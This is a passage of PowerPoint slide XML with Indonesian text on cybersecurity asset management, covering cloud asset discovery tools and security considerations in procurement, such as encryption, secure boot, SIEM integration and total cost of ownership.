              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Azure Resource Graph, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>CloudAware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>CloudCheckr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menemukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>katalog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di cloud.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Akuisisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pengadaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Aset</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Dari </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perspektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akuisisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengadaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertahankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>postur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pertimbangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memilih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bawaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> boot yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembaruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tambalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> rutin. Sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bekerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> vendor dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produsen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkemuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memprioritaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dukungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkelanjutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertimbangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membeli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terintegrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firewall, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>deteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intrusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> platform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peristiwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (SIEM). Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memfasilitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kohesif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> total </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepemilikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (TCO) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertimbangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembelian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>awal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemeliharaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembaruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>insiden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlangsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Memprioritaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akuisisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengadaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membangun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fondasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
